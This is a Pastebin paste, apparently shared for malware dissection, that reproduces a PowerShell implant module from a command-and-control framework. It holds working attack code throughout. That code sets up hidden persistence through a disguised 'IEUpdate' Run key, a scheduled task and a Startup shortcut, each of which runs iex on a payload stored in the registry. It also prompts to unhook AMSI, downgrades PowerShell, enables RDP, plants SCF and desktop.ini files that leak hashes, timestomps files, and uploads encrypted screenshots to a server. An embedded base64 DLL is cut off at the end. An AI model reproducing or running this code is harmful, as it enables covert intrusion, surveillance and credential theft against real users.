API tools faq
paste
dissectmalware

Malicious Powershell

dissectmalware
Jul 27th, 2018
1,204
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 39.41 KB | None | 0 0
raw download clone embed print report
  1. # malicious powershell
  2.  
  3. LoadModulefunction Test-Wow64() {
  4.     return (Test-Win32) -and (test-path env:\PROCESSOR_ARCHITEW6432)
  5. }
  6. function Test-Win64() {
  7.     return [IntPtr]::size -eq 8
  8. }
  9. function Test-Win32() {
  10.     return [IntPtr]::size -eq 4
  11. }
  12. Function Beacon($sleeptime) {
  13.     if ($sleeptime.ToLower().Contains('m')) {
  14.         $sleeptime = $sleeptime -replace 'm', ''
  15.         [int]$newsleep = $sleeptime
  16.         [int]$newsleep = $newsleep * 60
  17.     }
  18.     elseif ($sleeptime.ToLower().Contains('h')) {
  19.         $sleeptime = $sleeptime -replace 'h', ''
  20.         [int]$newsleep1 = $sleeptime
  21.         [int]$newsleep2 = $newsleep1 * 60
  22.         [int]$newsleep = $newsleep2 * 60
  23.     }
  24.     elseif ($sleeptime.ToLower().Contains('s')) {
  25.         $newsleep = $sleeptime -replace 's', ''
  26.     } else {
  27.         $newsleep = $sleeptime
  28.     }
  29.     $script:sleeptime = $newsleep
  30. }
  31. New-Alias SetBeacon Beacon
  32. Function Turtle($sleeptime) {
  33.     if ($sleeptime.ToLower().Contains('m')) {
  34.         $sleeptime = $sleeptime -replace 'm', ''
  35.         [int]$newsleep = $sleeptime
  36.         [int]$newsleep = $newsleep * 60
  37.     }
  38.     elseif ($sleeptime.ToLower().Contains('h')) {
  39.         $sleeptime = $sleeptime -replace 'h', ''
  40.         [int]$newsleep1 = $sleeptime
  41.         [int]$newsleep2 = $newsleep1 * 60
  42.         [int]$newsleep = $newsleep2 * 60
  43.     }
  44.     elseif ($sleeptime.ToLower().Contains('s')) {
  45.         $newsleep = $sleeptime -replace 's', ''
  46.     } else {
  47.         $newsleep = $sleeptime
  48.     }
  49.     Start-Sleep $newsleep
  50. }
  51. Function CheckArchitecture
  52. {
  53.     if (Test-Win64) {
  54.         Write-Output "64bit implant running on 64bit machine"
  55.     }
  56.     elseif ((Test-Win32) -and (-Not (Test-Wow64))) {
  57.         Write-Output "32bit running on 32bit machine"
  58.     }
  59.     elseif ((Test-Win32) -and (Test-Wow64)) {
  60.         $global:ImpUpgrade = $True
  61.         Write-Output "32bit implant running on a 64bit machine, use StartAnotherImplant to upgrade to 64bit"
  62.     }
  63.     else {
  64.         Write-Output "Unknown Architecture Detected"
  65.     }
  66.     get-process -id $pid -module |%{ if ($_.modulename -eq "amsi.dll") {echo "`n[+] AMSI Detected. Run Unhook-AMSI to unload Anti-Malware Scan Interface (AMSI)"} }
  67. }
  68. Function Get-Proxy {
  69.     Get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
  70. }
  71. Function CheckVersionTwo
  72. {
  73.     $psver = $PSVersionTable.psversion.Major
  74.     if ($psver -ne '2') {
  75.         Write-Output "`n[+] Powershell version $psver detected. Run Inject-Shellcode with the v2 Shellcode"
  76.         Write-Output "[+] Warning AMSI, Constrained Mode, ScriptBlock/Module Logging could be enabled"
  77.     }
  78. }
  79. $global:ImpUpgrade = $False
  80. CheckArchitecture
  81. CheckVersionTwo
  82. Function StartAnotherImplant {
  83.     if (($p = Get-Process | ? {$_.id -eq $pid}).name -ne "powershell") {
  84.         echo "Process is not powershell, try running migrate -x86 or migrate -x64"
  85.     } else {
  86.         if ($global:ImpUpgrade) {
  87.             echo "Start-Process Upgrade via CMD"
  88.             start-process -windowstyle hidden cmd -args "/c `"$env:windir\sysnative\windowspowershell\v1.0\$payload`""
  89.         } else {
  90.             echo "Start-Process via CMD"
  91.             start-process -windowstyle hidden cmd -args "/c $payload"
  92.         }
  93.     }
  94. }
  95. sal S StartAnotherImplant
  96. sal SAI StartAnotherImplant
  97. sal invoke-smblogin invoke-smbexec
  98. Function Invoke-DowngradeAttack
  99. {
  100.     $payload = $payload -replace "-exec", "-v 2 -exec"
  101.     StartAnotherImplant
  102. }
  103. function Test-Administrator  
  104. {  
  105.     $user = [Security.Principal.WindowsIdentity]::GetCurrent();
  106.     (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)  
  107. }
  108. function Check-Command($cmdname)
  109. {
  110.     return [bool](Get-Command -Name $cmdname -ErrorAction SilentlyContinue)
  111.     $error.clear()
  112. }
  113. function EnableRDP
  114. {
  115.     if (Test-Administrator) {
  116.         set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
  117.         set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1  
  118.         $psver = $PSVersionTable.psversion.Major
  119.         if ($psver -ne '2')
  120.         {
  121.             Get-NetFirewallRule -DisplayName "Remote Desktop*" | Set-NetFirewallRule -enabled true
  122.         } else {
  123.             netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389
  124.         }
  125.     } else {
  126.     Write-Output "You are not elevated to Administator "
  127.     }
  128. }
  129. function DisableRDP
  130. {
  131.     if (Test-Administrator) {
  132.         set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 1
  133.         set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 0
  134.         $psver = $PSVersionTable.psversion.Major
  135.         if ($psver -ne '2')
  136.         {
  137.             Get-NetFirewallRule -DisplayName "Remote Desktop*" | Set-NetFirewallRule -enabled false
  138.         } else {
  139.             netsh advfirewall firewall del rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389
  140.         }
  141.     } else {
  142.     Write-Output "You are not elevated to Administator "
  143.     }
  144. }
  145. function Write-SCFFile
  146. {
  147.     Param ($IPaddress, $Location)
  148.     "[Shell]" >$Location\~T0P0092.jpg.scf
  149.     "Command=2" >> $Location\~T0P0092.jpg.scf;
  150.     "IconFile=\\$IPaddress\remote.ico" >> $Location\~T0P0092.jpg.scf;
  151.     "[Taskbar]" >> $Location\~T0P0092.jpg.scf;
  152.     "Command=ToggleDesktop" >> $Location\~T0P0092.jpg.scf;
  153.     Write-Output "Written SCF File: $Location\~T0P0092.jpg.scf"
  154. }
  155. function Write-INIFile
  156. {
  157.     Param ($IPaddress, $Location)
  158.     "[.ShellClassInfo]" > $Location\desktop.ini
  159.     "IconResource=\\$IPAddress\resource.dll" >> $Location\desktop.ini
  160.     $a = Get-item $Location\desktop.ini -Force; $a.Attributes="Hidden"
  161.     Write-Output "Written INI File: $Location\desktop.ini"
  162. }
  163. Function Install-Persistence
  164. {
  165.     Param ($Method)
  166.     if (!$Method){$Method=1}
  167.     if ($Method -eq 1) {
  168.         Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777 -value "$payload"
  169.         Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate -value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -Noninteractive -windowstyle hidden -c iex (Get-ItemProperty -Path Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\).Wallpaper777"
  170.         $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate
  171.         $registrykey2 = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777
  172.         if (($registrykey.IEUpdate) -and ($registrykey2.Wallpaper777)) {
  173.         Write-Output "Successfully installed persistence: `n Regkey: HKCU\Software\Microsoft\Windows\currentversion\run\IEUpdate `n Regkey2: HKCU\Software\Microsoft\Windows\currentversion\themes\Wallpaper777"
  174.         } else {
  175.         Write-Output "Error installing persistence"
  176.         }
  177.     }
  178.     if ($Method -eq 2) {
  179.         Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555 -value "$payload"
  180.         $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555
  181.         schtasks.exe /create /sc minute /mo 240 /tn "IEUpdate" /tr "powershell -exec bypass -Noninteractive -windowstyle hidden -c iex (Get-ItemProperty -Path Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\).Wallpaper555"
  182.         If ($registrykey.Wallpaper555) {
  183.             Write-Output "Created scheduled task persistence every 4 hours"
  184.         }
  185.     }
  186.     if ($Method -eq 3) {
  187.         Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666 -value "$payload"
  188.         $registrykey2 = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666
  189.         $SourceExe = "powershell.exe"
  190.         $ArgumentsToSourceExe = "-exec bypass -Noninteractive -windowstyle hidden -c iex (Get-ItemProperty -Path Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\).Wallpaper666"
  191.         $DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\IEUpdate.lnk"
  192.         $WshShell = New-Object -comObject WScript.Shell
  193.         $Shortcut = $WshShell.CreateShortcut($DestinationPath)
  194.         $Shortcut.TargetPath = $SourceExe
  195.         $Shortcut.Arguments = $ArgumentsToSourceExe
  196.         $Shortcut.WindowStyle = 7
  197.         $Shortcut.Save()
  198.         If ((Test-Path $DestinationPath) -and ($registrykey2.Wallpaper666)) {
  199.             Write-Output "Created StartUp folder persistence and added RegKey`n Regkey: HKCU\Software\Microsoft\Windows\currentversion\themes\Wallpaper666"
  200.         } else {
  201.             Write-Output "Error installing StartUp folder persistence"
  202.         }
  203.     }
  204. }
  205. Function InstallExe-Persistence() {
  206.         $SourceEXE = "rundll32.exe"
  207.         $ArgumentsToSourceExe = "shell32.dll,ShellExec_RunDLL %temp%\winlogon.exe"
  208.         $DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
  209.         $WshShell = New-Object -comObject WScript.Shell
  210.         $Shortcut = $WshShell.CreateShortcut($DestinationPath)
  211.         $Shortcut.TargetPath = $SourceEXE
  212.         $Shortcut.Arguments = $ArgumentsToSourceExe
  213.         $Shortcut.WindowStyle = 7
  214.         $Shortcut.Save()
  215.         TimeStomp $DestinationPath "01/03/2008 12:12 pm"
  216.         If ((Test-Path $DestinationPath) -and (Test-Path "$env:Temp\Winlogon.exe")) {
  217.             Write-Output "Created StartUp file Exe persistence: $DestinationPath"
  218.         } else {
  219.             Write-Output "Error installing StartUp Exe persistence"
  220.         }
  221. }
  222. Function RemoveExe-Persistence() {
  223.         $DestinationPath1 = "$env:Temp\winlogon.exe"
  224.         Remove-Item -Force $DestinationPath1
  225.         $DestinationPath2 = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
  226.         Remove-Item -Force $DestinationPath2
  227.         TimeStomp $DestinationPath "01/03/2008 12:12 pm"
  228.         If ((Test-Path $DestinationPath1) -or ((Test-Path $DestinationPath2))) {
  229.             Write-Output "Unable to Remove Persistence"
  230.         } else {
  231.             Write-Output "Persistence Removed"
  232.         }
  233. }
  234. Function Remove-Persistence
  235. {
  236.     Param ($Method)
  237.     if (!$Method){$Method=1}
  238.     if ($Method -eq 1) {
  239.         Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777
  240.         Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate
  241.         $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate
  242.         $registrykey2 = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777
  243.         if (($registrykey -eq $null) -and ($registrykey2 -eq $null)) {
  244.         Write-Output "Successfully removed persistence from registry!"
  245.         $error.clear()
  246.         } else {
  247.         Write-Output "Error removing persistence, remove registry keys manually!"
  248.         $error.clear()
  249.     }
  250.     if ($Method -eq 2) {
  251.         schtasks.exe /delete /tn IEUpdate /F
  252.         Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555
  253.         $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555
  254.         if ($registrykey -eq $null) {
  255.             Write-Output "Successfully removed persistence from registry!"
  256.             Write-Output "Removed scheduled task persistence"
  257.         }else {
  258.             Write-Output "Error removing SchTasks persistence"
  259.         }
  260.     }
  261.     if ($Method -eq 3) {
  262.         Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666
  263.         $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666
  264.         Remove-Item "$env:APPDATA\Microsoft\Windows\StartMenu\Programs\Startup\IEUpdate.lnk"
  265.         If ((Test-Path $DestinationPath) -and ($registrykey.Wallpaper666)) {
  266.             Write-Output "Removed StartUp folder persistence"
  267.         }else {
  268.             Write-Output "Error installing StartUp folder persistence"
  269.         }
  270.     }
  271. }
  272. }
  273. Function Web-Upload-File
  274. {
  275.     Param
  276.     (
  277.         [string]
  278.         $From,
  279.         [string]
  280.         $To
  281.     )
  282.     (Get-Webclient).DownloadFile($From,$To)
  283. }
  284. function Unzip($file, $destination)
  285. {
  286.     $shell = new-object -com shell.application
  287.     $zip = $shell.NameSpace($file)
  288.     foreach($item in $zip.items())
  289.     {
  290.         $shell.Namespace($destination).copyhere($item)
  291.     }
  292. }
  293. function ConvertFrom-Base64
  294. {
  295.     param
  296.     (
  297.         [string] $SourceFilePath,
  298.         [string] $TargetFilePath
  299.     )
  300.  
  301.     $SourceFilePath = Resolve-PathSafe $SourceFilePath
  302.     $TargetFilePath = Resolve-PathSafe $TargetFilePath
  303.  
  304.     $bufferSize = 90000
  305.     $buffer = New-Object char[] $bufferSize
  306.      
  307.     $reader = [System.IO.File]::OpenText($SourceFilePath)
  308.     $writer = [System.IO.File]::OpenWrite($TargetFilePath)
  309.      
  310.     $bytesRead = 0
  311.     do
  312.     {
  313.         $bytesRead = $reader.Read($buffer, 0, $bufferSize);
  314.         $bytes = [Convert]::FromBase64CharArray($buffer, 0, $bytesRead);
  315.         $writer.Write($bytes, 0, $bytes.Length);
  316.     } while ($bytesRead -eq $bufferSize);
  317.      
  318.     $reader.Dispose()
  319.     $writer.Dispose()
  320. }
  321. Function Test-ADCredential
  322. {
  323.     Param($username, $password, $domain)
  324.     Add-Type -AssemblyName System.DirectoryServices.AccountManagement
  325.     $ct = [System.DirectoryServices.AccountManagement.ContextType]::Domain
  326.     $pc = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ct, $domain)
  327.     $object = New-Object PSObject | Select Username, Password, IsValid
  328.     $object.Username = $username;
  329.     $object.Password = $password;
  330.     $object.IsValid = $pc.ValidateCredentials($username, $password).ToString();
  331.     return $object
  332. }
  333. Function Get-ScreenshotMulti {
  334.     param($Timedelay, $Quantity)
  335.  
  336.     if ($Quantity -and $Timedelay) {
  337.         ForEach ($number in 1..[int]$Quantity ) {
  338.             $Output = Get-Screenshot        
  339.             $Output = Encrypt-String2 $key $Output
  340.             $UploadBytes = getimgdata $Output
  341.             (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  342.             Start-Sleep $Timedelay
  343.         }
  344.     }
  345. }
  346. Function Get-Screenshot
  347. {
  348.     param($File)
  349.  
  350.     #import libraries
  351.     Add-Type -AssemblyName System.Windows.Forms
  352.     Add-type -AssemblyName System.Drawing
  353.  
  354.     # Gather Screen resolution information
  355.     $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
  356.     $Width = $Screen.Width
  357.     $Height = $Screen.Height
  358.     $Left = $Screen.Left
  359.     $Top = $Screen.Top
  360.  
  361.     # Create bitmap using the top-left and bottom-right bounds
  362.     $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
  363.  
  364.     # Create Graphics object
  365.     $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
  366.  
  367.     # Capture screen
  368.     $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
  369.  
  370.     # Send back as base64
  371.     $msimage = New-Object IO.MemoryStream
  372.    
  373.     if ($File) {
  374.         $bitmap.save($file, "png")
  375.     } else {
  376.         $bitmap.save($msimage, "png")
  377.         $b64 = [Convert]::ToBase64String($msimage.toarray())
  378.     }
  379.     return $b64
  380. }
  381. $psloadedscreen = $null
  382. function Get-ScreenshotAllWindows {
  383.  
  384.     if ($psloadedscreen -ne "TRUE") {
  385.         $script:psloadedscreen = "TRUE"
  386.         $ps = "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AFZhbHVlVHlwZQBDYXB0dXJlAEVudW1XaW5kb3dTdGF0aW9uc0RlbGVnYXRlAEVudW1EZXNrdG9wc0RlbGVnYXRlAEVudW1EZXNrdG9wV2luZG93c0RlbGVnYXRlAE11bHRpY2FzdERlbGVnYXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3lzdGVtLkRyYXdpbmcAZ2V0X1dpZHRoAG5XaWR0aAB3aWR0aABBc3luY0NhbGxiYWNrAGNhbGxiYWNrAGdkaTMyLmRsbABVc2VyMzIuZGxsAHVzZXIzMi5kbGwAU2NyZWVuc2hvdC5kbGwAbFBhcmFtAFN5c3RlbQBCb3R0b20AU2NyZWVuAENhcHR1cmVSZWdpb24AcmVnaW9uAFVuaW9uAHdpblN0YXRpb24Ad2luZG93c1N0YXRpb24AQ2xvc2VXaW5kb3dTdGF0aW9uAE9wZW5XaW5kb3dTdGF0aW9uAEdldFByb2Nlc3NXaW5kb3dTdGF0aW9uAFNldFByb2Nlc3NXaW5kb3dTdGF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAENyZWF0ZUNvbXBhdGlibGVCaXRtYXAARnJvbUhiaXRtYXAAZHdSb3AAZ2V0X1RvcABDYXB0dXJlRGVza3RvcABDbG9zZURlc2t0b3AAaERlc2t0b3AAT3BlbkRlc2t0b3AAT3BlbklucHV0RGVza3RvcABkZXNrdG9wAFN0cmluZ0J1aWxkZXIAaHduZENoaWxkQWZ0ZXIALmN0b3IAR3JhcGhpY3MAR2V0U3lzdGVtTWV0cmljcwBTeXN0ZW0uRGlhZ25vc3RpY3MAZ2V0X0JvdW5kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBuRmxhZ3MAU3lzdGVtLldpbmRvd3MuRm9ybXMAZ2V0X0FsbFNjcmVlbnMARW51bVdpbmRvd1N0YXRpb25zAEVudW1EZXNrdG9wcwBscHN6Q2xhc3MAbmVlZEFjY2VzcwBFbnVtRGVza3RvcFdpbmRvd3MAR2V0V2luZG93UmVjdABEZWxldGVPYmplY3QAaE9iamVjdABTZWxlY3RPYmplY3QAb2JqZWN0AHJlY3QAZ2V0X0xlZnQAUmlnaHQAZ2V0X0hlaWdodABuSGVpZ2h0AGZJbmhlcml0AEJpdEJsdABJQXN5bmNSZXN1bHQAcmVzdWx0AGh3bmRQYXJlbnQAbk1heENvdW50AFNjcmVlbnNob3QAaGRjRGVzdABueERlc3QAbnlEZXN0AFN5c3RlbS5UZXh0AGxwV2luZG93VGV4dABHZXRXaW5kb3dUZXh0AEZpbmRXaW5kb3cAR2V0RGVza3RvcFdpbmRvdwBQcmludFdpbmRvdwBscHN6V2luZG93AEZpbmRXaW5kb3dFeAB3b3JraW5nQXJlYU9ubHkARW1wdHkAAAAAAMgUTmDMAYJGtc9up0YeCB0ABCABAQgD